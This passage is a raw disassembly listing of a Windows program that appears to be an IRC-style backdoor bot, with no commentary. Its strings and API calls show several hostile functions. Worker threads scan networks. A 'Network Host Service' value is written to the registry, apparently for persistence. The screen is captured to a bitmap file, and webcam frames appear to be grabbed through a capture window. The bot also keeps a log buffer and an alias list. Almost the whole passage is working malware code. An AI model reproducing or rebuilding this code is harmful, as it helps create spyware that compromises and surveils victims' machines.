mov dword_4331E0[ecx*8], eax
push 58h
pop ecx
lea esi, [ebp+var_160]
mov edi, esp
rep movsd
call sub_401141
xor ebx, ebx
add esp, 160h
cmp [ebp+var_140], ebx
jnz short loc_401C04
mov eax, dword_439F04
mov [ebp+var_140], eax
loc_401C04: ; CODE XREF: sub_401B94+63�j
push 9
call sub_413922
xor edi, edi
inc edi
cmp eax, edi
pop ecx
jnz short loc_401C7A
mov esi, offset dword_434180
push esi
call dword_422024 ; RtlDeleteCriticalSection
push 80000400h
push esi
call dword_422020 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_401C7A
lea eax, [ebp+var_1E0]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax
call sub_416975
cmp [ebp+var_10], ebx
pop ecx
pop ecx
jnz short loc_401C64
push ebx
push [ebp+var_14]
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_405D62
add esp, 14h
loc_401C64: ; CODE XREF: sub_401B94+B1�j
lea eax, [ebp+var_1E0]
push eax
call sub_401F0F
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_401C7A: ; CODE XREF: sub_401B94+7D�j
; sub_401B94+99�j
cmp [ebp+var_20], edi
mov eax, [ebp+var_2C]
mov esi, dword_422000
mov dword_4331E4[eax*8], edi
jb loc_401D37
loc_401C93: ; CODE XREF: sub_401B94+19D�j
push edi
push [ebp+var_2C]
lea eax, [ebp+var_160]
push [ebp+var_38]
mov [ebp+var_24], edi
push eax
lea eax, [ebp+var_1E0]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax
call sub_416975
push ebx
lea eax, [ebp+var_1E0]
push 9
push eax
call sub_413732
mov ecx, [ebp+var_2C]
mov [ebp+var_28], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_43B264[eax], ecx
lea eax, [ebp+var_160]
push eax
push offset sub_40195E
push ebx
push ebx
call dword_42200C ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_43B274[ecx], eax
jnz short loc_401D4E
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1E0]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax
call sub_416975
lea eax, [ebp+var_1E0]
push eax
call sub_401F0F
add esp, 10h
loc_401D29: ; CODE XREF: sub_401B94+1BF�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_401C93
loc_401D37: ; CODE XREF: sub_401B94+F9�j
cmp [ebp+var_30], ebx
jz short loc_401D5C
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_401D69
; ---------------------------------------------------------------------------
loc_401D4A: ; CODE XREF: sub_401B94+1BD�j
push 1Eh
call esi ; Sleep
loc_401D4E: ; CODE XREF: sub_401B94+16C�j
cmp [ebp+var_4], ebx
jz short loc_401D4A
jmp short loc_401D29
; ---------------------------------------------------------------------------
loc_401D55: ; CODE XREF: sub_401B94+1D3�j
push 7D0h
call esi ; Sleep
loc_401D5C: ; CODE XREF: sub_401B94+1A6�j
mov eax, [ebp+var_2C]
cmp dword_4331E4[eax*8], 1
jz short loc_401D55
loc_401D69: ; CODE XREF: sub_401B94+1B4�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_4331E0[eax*8]
push eax
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_1E0]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax
call sub_416975
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_401DB7
push ebx
push [ebp+var_14]
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_405D62
add esp, 14h
loc_401DB7: ; CODE XREF: sub_401B94+204�j
lea eax, [ebp+var_1E0]
push eax
call sub_401F0F
mov eax, [ebp+var_2C]
mov dword_4331E4[eax*8], ebx
mov [esp+220h+var_220], 0BB8h
call esi ; Sleep
push 9
call sub_413922
cmp eax, 1
pop ecx
jnz short loc_401DEE
push offset dword_434180
call dword_422024 ; RtlDeleteCriticalSection
loc_401DEE: ; CODE XREF: sub_401B94+24D�j
push [ebp+var_2C]
call sub_4139F6
pop ecx
push ebx
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_401B94 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401DFF proc near ; CODE XREF: sub_409848+3962�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
mov edi, offset dword_47FF58
loc_401E09: ; CODE XREF: sub_401DFF+4D�j
cmp byte ptr [edi], 0
jz short loc_401E50
mov esi, [esp+0Ch+arg_0]
mov eax, edi
loc_401E14: ; CODE XREF: sub_401DFF+31�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_401E36
test cl, cl
jz short loc_401E32
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_401E36
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_401E14
loc_401E32: ; CODE XREF: sub_401DFF+1F�j
xor eax, eax
jmp short loc_401E3B
; ---------------------------------------------------------------------------
loc_401E36: ; CODE XREF: sub_401DFF+1B�j
; sub_401DFF+29�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401E3B: ; CODE XREF: sub_401DFF+35�j
test eax, eax
jz short loc_401E50
add edi, 0B8h
inc ebx
cmp edi, offset dword_480AD8
jl short loc_401E09
jmp short loc_401E91
; ---------------------------------------------------------------------------
loc_401E50: ; CODE XREF: sub_401DFF+D�j
; sub_401DFF+3E�j
mov esi, ebx
imul esi, 0B8h
push 2Eh
pop ecx
push 17h
push [esp+10h+arg_0]
lea edx, dword_47FF58[esi]
xor eax, eax
mov edi, edx
push edx
rep stosd
call sub_416A00
push 9Fh
push [esp+1Ch+arg_4]
lea eax, dword_47FF70[esi]
push eax
call sub_416A00
add esp, 18h
inc dword_4301C0
loc_401E91: ; CODE XREF: sub_401DFF+4F�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_401DFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E97 proc near ; CODE XREF: sub_409848+5085�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
xor edi, edi
mov esi, offset dword_47FF58
loc_401EC1: ; CODE XREF: sub_401E97+72�j
cmp byte ptr [esi], 0
jz short loc_401EFC
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_416BCD
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 2Ch
loc_401EFC: ; CODE XREF: sub_401E97+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_480AD8
jl short loc_401EC1
pop edi
pop esi
leave
retn
sub_401E97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F0F proc near ; CODE XREF: start+BE�p sub_4010CA+6D�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call dword_422028 ; GetLocalTime
mov ebx, offset dword_438A98
mov edi, 80h
mov esi, offset dword_434A98
loc_401F31: ; CODE XREF: sub_401F0F+3D�j
cmp byte ptr [ebx], 0
jz short loc_401F48
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_416A00
add esp, 0Ch
loc_401F48: ; CODE XREF: sub_401F0F+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_401F31
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_416BCD
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_401F0F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F83 proc near ; CODE XREF: sub_4096E9+A4�p
; sub_409848:loc_40CEFA�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_80]
push 80h
push eax
call sub_416C24
lea eax, [ebp+var_80]
push eax
call sub_401F0F
add esp, 14h
leave
retn
sub_401F83 endp
; =============== S U B R O U T I N E =======================================
sub_401FAF proc near ; CODE XREF: sub_409848+4F79�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_434A98
xor ecx, ecx
loc_401FB6: ; CODE XREF: sub_401FAF+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_438A98
jl short loc_401FB6
cmp [esp+arg_C], ecx
push esi
mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_401FE6
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_405D62
add esp, 14h
loc_401FE6: ; CODE XREF: sub_401FAF+1F�j
push esi
call sub_401F0F
pop ecx
pop esi
retn
sub_401FAF endp
; =============== S U B R O U T I N E =======================================
sub_401FEF proc near ; CODE XREF: .text:00414849�p
; .text:00414A7C�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_434A98
loc_401FF5: ; CODE XREF: sub_401FEF+27�j
cmp byte ptr [esi], 0
jz short loc_40200A
push [esp+4+arg_0]
push esi
call sub_407736
test eax, eax
pop ecx
pop ecx
jnz short loc_40201C
loc_40200A: ; CODE XREF: sub_401FEF+9�j
add esi, 80h
cmp esi, offset dword_438A98
jl short loc_401FF5
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40201C: ; CODE XREF: sub_401FEF+19�j
xor eax, eax
inc eax
pop esi
retn
sub_401FEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402021 proc near ; DATA XREF: sub_409848+5030�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_402074
push edx
push [ebp+var_14]
lea eax, [ebp+var_118]
push offset aLogBegin ; "[LOG]: Begin"
push eax
push [ebp+var_11C]
call sub_405D62
add esp, 14h
loc_402074: ; CODE XREF: sub_402021+33�j
cmp [ebp+var_98], 0
jz short loc_402094
lea eax, [ebp+var_98]
push eax
call sub_416D02
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_402094
mov [ebp+var_8], eax
loc_402094: ; CODE XREF: sub_402021+5A�j
; sub_402021+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_434A98
loc_40209D: ; CODE XREF: sub_402021+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_4020F7
cmp byte ptr [esi], 0
jz short loc_4020E6
cmp [ebp+var_98], 0
jz short loc_4020CC
cmp [ebp+var_4], 0
jnz short loc_4020CC
lea eax, [ebp+var_98]
push eax
push esi
call sub_407736
test eax, eax
pop ecx
pop ecx
jz short loc_4020E6
loc_4020CC: ; CODE XREF: sub_402021+90�j
; sub_402021+96�j
push edi
push [ebp+var_14]
lea eax, [ebp+var_118]
push esi
push eax
push [ebp+var_11C]
call sub_405D62
add esp, 14h
loc_4020E6: ; CODE XREF: sub_402021+87�j
; sub_402021+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_438A98
jl short loc_40209D
loc_4020F7: ; CODE XREF: sub_402021+82�j
lea eax, [ebp+var_31C]
push offset aLogListComplet ; "[LOG]: List complete."
push eax
call sub_416975
xor esi, esi
cmp [ebp+var_10], esi
pop ecx
pop ecx
jnz short loc_402131
push esi
push [ebp+var_14]
lea eax, [ebp+var_31C]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_405D62
add esp, 14h
loc_402131: ; CODE XREF: sub_402021+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_401F0F
push [ebp+var_18]
call sub_4139F6
pop ecx
pop ecx
push esi
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_402021 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40214F proc near ; CODE XREF: sub_407576+1E�p
; sub_40FB4C+34A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset aNetworkHostSer ; "Network Host Service"
loc_40215F: ; CODE XREF: sub_40214F+6F�j
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push off_42E4F4[edi]
push dword_42E4F0[edi]
call dword_43A408 ; RegCreateKeyExA
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4021A5
lea edx, [eax+1]
loc_402189: ; CODE XREF: sub_40214F+3F�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402189
sub eax, edx
push eax
push [ebp+arg_0]
push 1
push ebx
push esi
push [ebp+var_4]
call dword_43A3A0 ; RegSetValueExA
jmp short loc_4021AF
; ---------------------------------------------------------------------------
loc_4021A5: ; CODE XREF: sub_40214F+35�j
push esi
push [ebp+var_4]
call dword_43A3FC ; RegDeleteValueA
loc_4021AF: ; CODE XREF: sub_40214F+54�j
push [ebp+var_4]
call dword_43A4A0 ; RegCloseKey
add edi, 8
cmp edi, 18h
jb short loc_40215F
pop edi
pop esi
pop ebx
leave
retn
sub_40214F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4021C5 proc near ; CODE XREF: sub_409848+3AB4�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 484h
push esi
push edi
xor esi, esi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call dword_43A504 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+74h+var_20], edi
jnz short loc_4021F2
xor eax, eax
jmp loc_4023FB
; ---------------------------------------------------------------------------
loc_4021F2: ; CODE XREF: sub_4021C5+24�j
push ebx
push 8
push edi
call dword_43A430 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+74h+var_C], eax
call dword_43A430 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+74h+var_4], eax
call dword_43A430 ; GetDeviceCaps
cmp eax, 8
mov [ebp+74h+var_10], eax
ja short loc_40222C
push 18h
push edi
call dword_43A430 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_40222E
; ---------------------------------------------------------------------------
loc_40222C: ; CODE XREF: sub_4021C5+55�j
xor ebx, ebx
loc_40222E: ; CODE XREF: sub_4021C5+65�j
push edi
call dword_43A438 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+74h+var_8], eax
jz loc_4023DD
mov eax, [ebp+74h+var_C]
mov [ebp+74h+var_80], eax
mov eax, [ebp+74h+var_4]
mov [ebp+74h+var_7C], eax
mov ax, word ptr [ebp+74h+var_10]
push esi
push esi
mov [ebp+74h+var_76], ax
lea eax, [ebp+74h+var_18]
push eax
push 1
lea eax, [ebp+74h+var_84]
push eax
push edi
mov [ebp+74h+var_84], 28h
mov [ebp+74h+var_78], 1
mov [ebp+74h+var_74], esi
mov [ebp+74h+var_70], esi
mov [ebp+74h+var_6C], esi
mov [ebp+74h+var_68], esi
mov [ebp+74h+var_64], ebx
mov [ebp+74h+var_60], ebx
call dword_43A4D4 ; CreateDIBSection
cmp eax, esi
mov [ebp+74h+var_1C], eax
jz loc_4023E8
push eax
push [ebp+74h+var_8]
call dword_43A34C ; SelectObject
cmp eax, esi
jz loc_4023E8
cmp eax, 0FFFFFFFFh
jz loc_4023E8
push 0CC0020h
push esi
push esi
push edi
push [ebp+74h+var_4]
push [ebp+74h+var_C]
push esi
push esi
push [ebp+74h+var_8]
call dword_43A448 ; BitBlt
test eax, eax
jz loc_4023E8
cmp ebx, esi
jz short loc_4022E5
lea eax, [ebp+74h+var_484]
push eax
push ebx
push esi
push [ebp+74h+var_8]
call dword_43A478 ; GetDIBColorTable
mov ebx, eax
loc_4022E5: ; CODE XREF: sub_4021C5+10A�j
mov edi, [ebp+74h+var_10]
imul edi, [ebp+74h+var_4]
mov ecx, [ebp+74h+var_C]
imul edi, ecx
push esi
push 80h
push 2
mov eax, ebx
shl eax, 2
mov [ebp+74h+var_C], eax
shr edi, 3
lea edx, [eax+edi+36h]
add eax, 36h
push esi
mov [ebp+74h+var_26], eax
mov eax, [ebp+74h+var_4]
push esi
push 40000000h
push [ebp+74h+arg_0]
mov [ebp+74h+var_50], eax
mov ax, word ptr [ebp+74h+var_10]
mov [ebp+74h+var_30], 4D42h
mov [ebp+74h+var_2E], edx
mov [ebp+74h+var_2A], si
mov [ebp+74h+var_28], si
mov [ebp+74h+var_58], 28h
mov [ebp+74h+var_54], ecx
mov [ebp+74h+var_4C], 1
mov [ebp+74h+var_4A], ax
mov [ebp+74h+var_48], esi
mov [ebp+74h+var_44], esi
mov [ebp+74h+var_40], esi
mov [ebp+74h+var_3C], esi
mov [ebp+74h+var_38], ebx
mov [ebp+74h+var_34], esi
call dword_422034 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jz short loc_4023C8
push esi
lea ecx, [ebp+74h+var_14]
push ecx
push 0Eh
lea ecx, [ebp+74h+var_30]
push ecx
push eax
call dword_422030 ; WriteFile
push esi
lea eax, [ebp+74h+var_14]
push eax
push 28h
lea eax, [ebp+74h+var_58]
push eax
push [ebp+74h+var_4]
call dword_422030 ; WriteFile
cmp ebx, esi
jz short loc_4023AA
push esi
lea eax, [ebp+74h+var_14]
push eax
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_484]
push eax
push [ebp+74h+var_4]
call dword_422030 ; WriteFile
loc_4023AA: ; CODE XREF: sub_4021C5+1CB�j
push esi
lea eax, [ebp+74h+var_14]
push eax
push edi
push [ebp+74h+var_18]
push [ebp+74h+var_4]
call dword_422030 ; WriteFile
push [ebp+74h+var_4]
call dword_42202C ; CloseHandle
xor esi, esi
inc esi
loc_4023C8: ; CODE XREF: sub_4021C5+1A1�j
push [ebp+74h+var_1C]
call dword_43A43C ; DeleteObject
push [ebp+74h+var_8]
call dword_43A3E8 ; DeleteDC
mov edi, [ebp+74h+var_20]
loc_4023DD: ; CODE XREF: sub_4021C5+75�j
push edi
call dword_43A3E8 ; DeleteDC
mov eax, esi
jmp short loc_4023FA
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_4021C5+C6�j
; sub_4021C5+D8�j ...
push edi
call dword_43A3E8 ; DeleteDC
push [ebp+74h+var_8]
call dword_43A3E8 ; DeleteDC
xor eax, eax
loc_4023FA: ; CODE XREF: sub_4021C5+221�j
pop ebx
loc_4023FB: ; CODE XREF: sub_4021C5+28�j
pop edi
pop esi
add ebp, 74h
leave
retn
sub_4021C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402402 proc near ; CODE XREF: sub_409848+3BDC�p
var_38 = byte ptr -38h
var_24 = dword ptr -24h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
xor ebx, ebx
inc ebx
push ebx
push dword_438A98
xor esi, esi
push 78h
push 0A0h
push esi
push esi
push 40000000h
push offset aWindow ; "Window"
call dword_43A3F0
mov edi, eax
cmp edi, esi
mov [ebp+var_8], edi
jnz short loc_402440
mov eax, ebx
jmp loc_4025F9
; ---------------------------------------------------------------------------
loc_402440: ; CODE XREF: sub_402402+35�j
push edi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_40245D
push esi
push [ebp+arg_4]
push 40Ah
push edi
call dword_43A484 ; SendMessageA
jmp short loc_40245F
; ---------------------------------------------------------------------------
loc_40245D: ; CODE XREF: sub_402402+47�j
xor eax, eax
loc_40245F: ; CODE XREF: sub_402402+59�j
cmp eax, esi
jnz short loc_40246A
loc_402463: ; CODE XREF: sub_402402+88�j
; sub_402402+BC�j
mov esi, ebx
jmp loc_4025EE
; ---------------------------------------------------------------------------
loc_40246A: ; CODE XREF: sub_402402+5F�j
push edi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_402487
lea eax, [ebp+var_38]
push eax
push 2Ch
push 40Eh
push edi
call dword_43A484 ; SendMessageA
loc_402487: ; CODE XREF: sub_402402+71�j
cmp [ebp+var_24], esi
jz short loc_402463
push edi
call dword_43A344 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_4024AD
push esi
push esi
push edi
push [ebp+var_8]
call dword_43A484 ; SendMessageA
mov [ebp+var_4], eax
jmp short loc_4024B0
; ---------------------------------------------------------------------------
loc_4024AD: ; CODE XREF: sub_402402+98�j
mov [ebp+var_4], esi
loc_4024B0: ; CODE XREF: sub_402402+A9�j
push [ebp+var_4]
call sub_416E1F
cmp eax, esi
pop ecx
mov [ebp+var_C], eax
jz short loc_402463
push [ebp+var_4]
call sub_416E1F
mov ebx, eax
cmp ebx, esi
pop ecx
jnz short loc_4024D7
xor esi, esi
inc esi
jmp loc_4025EE
; ---------------------------------------------------------------------------
loc_4024D7: ; CODE XREF: sub_402402+CB�j
push [ebp+var_8]
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_4024F4
push [ebp+var_C]
push [ebp+var_4]
push edi
push [ebp+var_8]
call dword_43A484 ; SendMessageA
loc_4024F4: ; CODE XREF: sub_402402+E0�j
mov ecx, [ebp+var_4]
mov esi, [ebp+var_C]
mov eax, ecx
shr ecx, 2
mov edi, ebx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+arg_8]
xor edx, edx
cmp ecx, edx
jg short loc_402518
mov ecx, 280h
loc_402518: ; CODE XREF: sub_402402+10F�j
mov eax, [ebp+arg_C]
cmp eax, edx
jg short loc_402524
mov eax, 1E0h
loc_402524: ; CODE XREF: sub_402402+11B�j
mov edi, [ebp+var_8]
and byte ptr [ebx+28h], 0
and byte ptr [ebx+29h], 0
and byte ptr [ebx+2Ah], 0
and byte ptr [ebx+2Bh], 0
push edi
mov [ebx+4], ecx
mov [ebx+8], eax
mov word ptr [ebx+0Eh], 10h
mov [ebx+14h], edx
mov [ebx+10h], edx
mov [ebx+20h], edx
mov [ebx+24h], edx
mov word ptr [ebx+0Ch], 1
call dword_43A344 ; IsWindow
test eax, eax
mov esi, 42Dh
jz short loc_402571
push ebx
push [ebp+var_4]
push esi
push edi
call dword_43A484 ; SendMessageA
loc_402571: ; CODE XREF: sub_402402+161�j
push edi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_40258C
push 0
push 0
push 43Dh
push edi
call dword_43A484 ; SendMessageA
loc_40258C: ; CODE XREF: sub_402402+178�j
push edi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_4025A8
push [ebp+arg_0]
push 0
push 419h
push edi
call dword_43A484 ; SendMessageA
loc_4025A8: ; CODE XREF: sub_402402+193�j
push edi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_4025C1
push [ebp+var_C]
push [ebp+var_4]
push esi
push edi
call dword_43A484 ; SendMessageA
loc_4025C1: ; CODE XREF: sub_402402+1AF�j
push [ebp+var_C]
call sub_416D07
push ebx
call sub_416D07
pop ecx
pop ecx
push edi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_4025EC
push 0
push 0
push 40Bh
push edi
call dword_43A484 ; SendMessageA
loc_4025EC: ; CODE XREF: sub_402402+1D8�j
xor esi, esi
loc_4025EE: ; CODE XREF: sub_402402+63�j
; sub_402402+D0�j
push [ebp+var_8]
call dword_43A3B4 ; DestroyWindow
mov eax, esi
loc_4025F9: ; CODE XREF: sub_402402+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_402402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4025FE proc near ; CODE XREF: sub_409848+3C94�p
var_98 = byte ptr -98h
var_84 = dword ptr -84h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
xor ebx, ebx
inc ebx
push ebx
push dword_438A98
xor esi, esi
push 78h
push 0A0h
push esi
push esi
push 40000000h
push offset aWindow ; "Window"
call dword_43A3F0
mov edi, eax
cmp edi, esi
mov [ebp+var_8], edi
jnz short loc_40263F
mov eax, ebx
jmp loc_402853
; ---------------------------------------------------------------------------
loc_40263F: ; CODE XREF: sub_4025FE+38�j
push edi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_40265C
push esi
push [ebp+arg_4]
push 40Ah
push edi
call dword_43A484 ; SendMessageA
jmp short loc_40265E
; ---------------------------------------------------------------------------
loc_40265C: ; CODE XREF: sub_4025FE+4A�j
xor eax, eax
loc_40265E: ; CODE XREF: sub_4025FE+5C�j
cmp eax, esi
jnz short loc_402669
loc_402662: ; CODE XREF: sub_4025FE+91�j
; sub_4025FE+C5�j
mov edi, ebx
jmp loc_402848
; ---------------------------------------------------------------------------
loc_402669: ; CODE XREF: sub_4025FE+62�j
push edi
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_402689
lea eax, [ebp+var_98]
push eax
push 2Ch
push 40Eh
push edi
call dword_43A484 ; SendMessageA
loc_402689: ; CODE XREF: sub_4025FE+74�j
cmp [ebp+var_84], esi
jz short loc_402662
push edi
call dword_43A344 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_4026B2
push esi
push esi
push edi
push [ebp+var_8]
call dword_43A484 ; SendMessageA
mov [ebp+var_4], eax
jmp short loc_4026B5
; ---------------------------------------------------------------------------
loc_4026B2: ; CODE XREF: sub_4025FE+A1�j
mov [ebp+var_4], esi
loc_4026B5: ; CODE XREF: sub_4025FE+B2�j
push [ebp+var_4]
call sub_416E1F
cmp eax, esi
pop ecx
mov [ebp+var_C], eax
jz short loc_402662
push [ebp+var_4]
call sub_416E1F
mov ebx, eax
cmp ebx, esi
pop ecx
jnz short loc_4026DC
xor edi, edi
inc edi
jmp loc_402848
; ---------------------------------------------------------------------------
loc_4026DC: ; CODE XREF: sub_4025FE+D4�j
push [ebp+var_8]
call dword_43A344 ; IsWindow
test eax, eax
jz short loc_4026F9
push [ebp+var_C]
push [ebp+var_4]
push edi
push [ebp+var_8]
call dword_43A484 ; SendMessageA
loc_4026F9: ; CODE XREF: sub_4025FE+E9�j
mov ecx, [ebp+var_4]
mov esi, [ebp+var_C]
mov eax, ecx
shr ecx, 2
mov edi, ebx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+arg_C]
xor edi, edi
cmp ecx, edi
jg short loc_40271D
mov ecx, 0A0h
loc_40271D: ; CODE XREF: sub_4025FE+118�j
mov eax, [ebp+arg_10]
cmp eax, edi
jg short loc_402727
push 78h
pop eax
